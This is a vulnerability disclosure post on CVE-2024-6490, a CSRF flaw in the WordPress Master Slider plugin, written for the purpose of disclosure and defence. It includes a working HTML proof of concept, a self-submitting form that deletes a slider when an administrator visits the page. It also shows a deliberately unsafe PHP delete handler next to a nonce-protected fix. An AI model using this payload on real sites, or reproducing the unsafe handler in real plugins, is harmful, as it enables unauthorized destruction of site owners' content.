In the ever-evolving landscape of WordPress security, plugins often introduce as much risk as they do functionality. A recent discovery in the Master Slider plugin, a popular choice among WordPress users for creating responsive image and content sliders, underscores this issue vividly. This article delves into a critical CSRF (Cross-Site Request Forgery) vulnerability identified in the plugin, labeled under CVE-2024-6490, which allows attackers to delete sliders without authorization.
| Field | Value |
|---|---|
| CVE | CVE-2024-6490 |
| Plugin | Master Slider – Responsive Touch Slider <= 3.9.10 |
| Critical | High |
| All Time Downloads | 2 852 272 |
| Active installations | 80 000+ |
| Publicly Published | August 1, 2024 |
| Last Updated | August 1, 2024 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A2: Broken Authentication and Session Management |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6490 https://wpscan.com/vulnerability/5a56e5aa-841d-4be5-84da-4c3b7602f053/ |
Timeline

| Date | Event |
|---|---|
| June 4, 2024 | Plugin testing and vulnerability detection in the Master Slider have been completed |
| June 4, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| August 1, 2024 | Registered CVE-2024-6490 |
Discovery of the Vulnerability
The vulnerability was uncovered during routine security checks designed to assess the robustness of plugins against common web attacks. CSRF vulnerabilities exploit the trust that a site has in the user’s browser, allowing attackers to perform actions without the user’s knowledge or consent. In the case of Master Slider, the vulnerability was triggered through a seemingly innocuous piece of HTML code that could be placed on any website visited by an administrator.
Understanding CSRF Attacks
Cross-Site Request Forgery (CSRF) is a well-documented web security flaw that allows an attacker to induce users to perform actions that they do not intend to perform. It targets state-changing requests like data deletion or update and can lead to significant disruptions in service. WordPress, with its extensive plugin ecosystem, is particularly vulnerable to CSRF due to the varied security practices of third-party developers.
Exploiting the CSRF Vulnerability
The exploitation of this CSRF vulnerability is alarmingly straightforward. An attacker only needs to trick an administrator into clicking a link or visiting a malicious website where the CSRF exploit code is silently executed. This code then sends a forged request to the WordPress site where the Master Slider is installed, leading to the deletion of sliders. The proof of concept provided shows how simple HTML and JavaScript can be used to create a form that automatically submits this request.
POC:

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php">
      <input type="hidden" name="page" value="master-slider" />
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="slider_id" value="4" />
      <input type="hidden" name="paged" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
The risks associated with this vulnerability are not to be underestimated. For websites that rely heavily on sliders for user engagement or advertising, the unauthorized deletion of these elements could lead to a loss of revenue, diminished user experience, and damage to the site’s reputation. Furthermore, the simplicity of launching a CSRF attack makes it a likely attack vector for malicious actors targeting websites with less stringent security measures.
Recommendations for Improved Security
To mitigate this vulnerability and enhance overall site security, the following measures are recommended:
- Use Nonces: WordPress offers a mechanism called nonces (number used once) to protect against CSRF. Plugin developers should utilize nonces in every form and AJAX request that results in a state change.
- Educate Users: Admin users should be educated about the dangers of CSRF attacks and cautious about clicking links from unknown or untrusted sources.
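As an added illustration of the nonce recommendation (example code written for this article, not Master Slider's own source), the following shows a hypothetical admin-page delete handler in the CSRF-prone shape the PoC targets, beside a hardened version that mints the delete link with `wp_nonce_url()` and verifies it with `check_admin_referer()` plus a capability check. All function names prefixed `example_` are assumptions.

```php
<?php
// Added example (not Master Slider's own code): a hypothetical admin-page
// handler that deletes a slider, first as the CSRF-prone pattern the PoC
// targets, then hardened with a WordPress nonce and a capability check.
// Function and hook names below are illustrative assumptions.

// Vulnerable pattern: any request carrying page=master-slider&action=delete
// &slider_id=N is honoured as long as the browser sends an admin cookie,
// which is exactly what the forged form in the PoC relies on.
function example_handle_delete_unsafe() {
    if ( isset( $_GET['page'], $_GET['action'], $_GET['slider_id'] )
        && 'master-slider' === $_GET['page'] && 'delete' === $_GET['action'] ) {
        example_delete_slider( absint( $_GET['slider_id'] ) );
    }
}

// Hardened pattern: the delete link is minted with a nonce bound to the
// action and the slider id, and the handler refuses the request unless the
// nonce verifies and the user actually holds the required capability.
function example_delete_link( $slider_id ) {
    $url = add_query_arg(
        array( 'page' => 'master-slider', 'action' => 'delete', 'slider_id' => $slider_id ),
        admin_url( 'admin.php' )
    );
    // wp_nonce_url() appends _wpnonce=<token> tied to this action string.
    return wp_nonce_url( $url, 'delete-slider_' . $slider_id );
}

function example_handle_delete_safe() {
    if ( ! isset( $_GET['page'], $_GET['action'], $_GET['slider_id'] )
        || 'master-slider' !== $_GET['page'] || 'delete' !== $_GET['action'] ) {
        return;
    }
    $slider_id = absint( $_GET['slider_id'] );
    // check_admin_referer() stops the request with "The link you followed has
    // expired." when _wpnonce is missing, stale or minted for another action.
    check_admin_referer( 'delete-slider_' . $slider_id );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to delete sliders.' ) );
    }
    example_delete_slider( $slider_id );
}

function example_delete_slider( $slider_id ) {
    // Placeholder for the plugin's own deletion logic (assumption).
    delete_option( 'example_slider_' . $slider_id );
}

add_action( 'admin_init', 'example_handle_delete_safe' );
```

Because the nonce is bound to the logged-in user's session and to the specific action string, a form hosted on a third-party site cannot supply a valid `_wpnonce`, so the forged request from the PoC is rejected before any slider is touched.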
By taking proactive measures to address CSRF vulnerabilities like CVE-2024-6490, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #VeryHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.